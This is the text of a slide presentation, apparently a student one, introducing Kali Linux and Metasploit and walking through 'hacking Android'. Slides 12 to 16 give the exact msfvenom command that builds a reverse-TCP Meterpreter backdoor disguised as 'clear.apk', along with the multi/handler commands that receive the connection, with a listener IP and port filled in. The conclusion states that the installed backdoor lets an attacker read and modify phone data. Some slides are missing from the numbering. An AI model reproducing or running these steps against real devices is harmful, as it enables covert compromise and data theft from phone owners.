2. CONTENTS
Introduction
Kali Linux
Penetration testing
Metasploit
Introduction to Metasploit
Advantages & Disadvantages
Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and AttackerSetup
Commands to exploits victim’sAndroid
Future Scope
Conclusion
References
3. INTRODUCTION ON KALI LINUX
Debian-based Linuxdistribution aimed at advanced
PenetrationTestingand SecurityAuditing.
ReleaseDate: March 13th, 2013.
Security-focused versionof Linuxthat offers a large
numberof tools to seekout weaknessesand secure
your network.
Kali containsseveraltools
Information security tasks
PenetrationTesting,Securityresearch
Computer Forensicsand ReverseEngineering
4. Developers: Mati Aharoni, DevonKearnsand
Raphael Hertzog of offensive security.
Open source
600 penetration testing tools + Applications
Platforms - x86, x86-64, armel
LatestRelease– Kali 2017.3 – 21st November, 2017
Easyupgrade to future versions
5. Also called pentesting
Testing a computer system/network /Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Meet regulatoryrequirements
Preserve corporate image and customer loyalty
Penetration Testing
6. MAIN TERMS
EXPLOIT- a piece of code written to take advantage of a
particular vulnerability inthe system.
PAYLOAD- simplescriptsthat the hackersutilize to interact with a
hacked system.
LHOST- TheIPaddress youwant your listener to bind to.
LPORT- Theport youwantyour listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in memorydll injection & extended over the n/w at runtime.
7. METASPLOIT
penetration testing platform that enables to find,
exploit, andvalidate vulnerabilities.
Author:Rapid7
License: BSD-3-clause
Twoversions:commercial and free(Community)
edition.
hardware requirements to install Metasploit
1 GB RAM available
1 GB+ available diskspace
2 GHz+ processor
8. METASPLOITINTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole –part of metasploitframework,
provide interface with all options.
Msfcli –runs directly from the commandline&
puts priority on scripting.
Armitage –GUI for metasploit framework.
9. Advantages
Open source
Frequently updated
Huge community
Easy to deployuser specific exploit
Disadvantages
Difficult to learn
Can crash your system if not used wisely
Requires deep knowledge for exploit development
12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom –p android/meterpreter/reverse_tcp
LHOST=192.168.43.207 LPORT=6060 R > clear.apk
14. STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
metasploit payload system to exploit. msf > use
exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
15.
16. STEP 8: RUN THE COMMAND “ exploit ”
msf exploit(multi/handler) > exploit
17. FUTURE SCOPE
Beingopen sourceframework, it hasgot huge
community support.
Inorder to face newsecurity challengesMetasploit
isfrequently updated for zero-day vulnerabilities.
More and moreexploits will be made available to
its database for users.
Upcomingversionswill be moreefficient, user-
friendly, GUI-based, web-based with customizing
options along with its interactive console.
18. CONCLUSION
The backdoor application when installed and turned on the
mobile allows attacker to read, write and modify data. Cautions are.
Never permanently enable installing of Apps from “Unknown
sources “.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Installing antivirus software on your Android device.